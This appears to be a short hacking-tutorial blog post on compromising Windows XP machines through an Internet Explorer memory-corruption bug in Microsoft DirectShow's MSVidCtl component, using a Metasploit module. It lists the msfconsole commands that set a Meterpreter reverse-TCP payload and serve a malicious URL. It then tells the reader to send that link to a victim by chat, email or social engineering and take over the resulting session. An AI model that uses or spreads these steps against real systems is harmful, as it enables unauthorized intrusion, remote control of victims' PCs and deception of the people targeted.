Hack Remote Windows PC using Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption

This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. ClassID is now configurable via an advanced option (otherwise randomized) – I) ruid

Exploit Targets

Internet Explorer 6 on XP SP2

Internet Explorer 7 on XP SP2


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/msvidctl_mpeg2

Msf exploit (msvidctl_mpeg2)>set payload windows/meterpreter/reverse_tcp

Msf exploit (msvidctl_mpeg2)>set lhost (IP of Local Host)

Msf exploit (msvidctl_mpeg2)>set srvhost (This must be an address on the local machine)

Msf exploit (msvidctl_mpeg2)>set uripath newfunctions (The Url to use for this exploit)

Msf exploit (msvidctl_mpeg2)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


Leave a Reply

Your email address will not be published. Required fields are marked *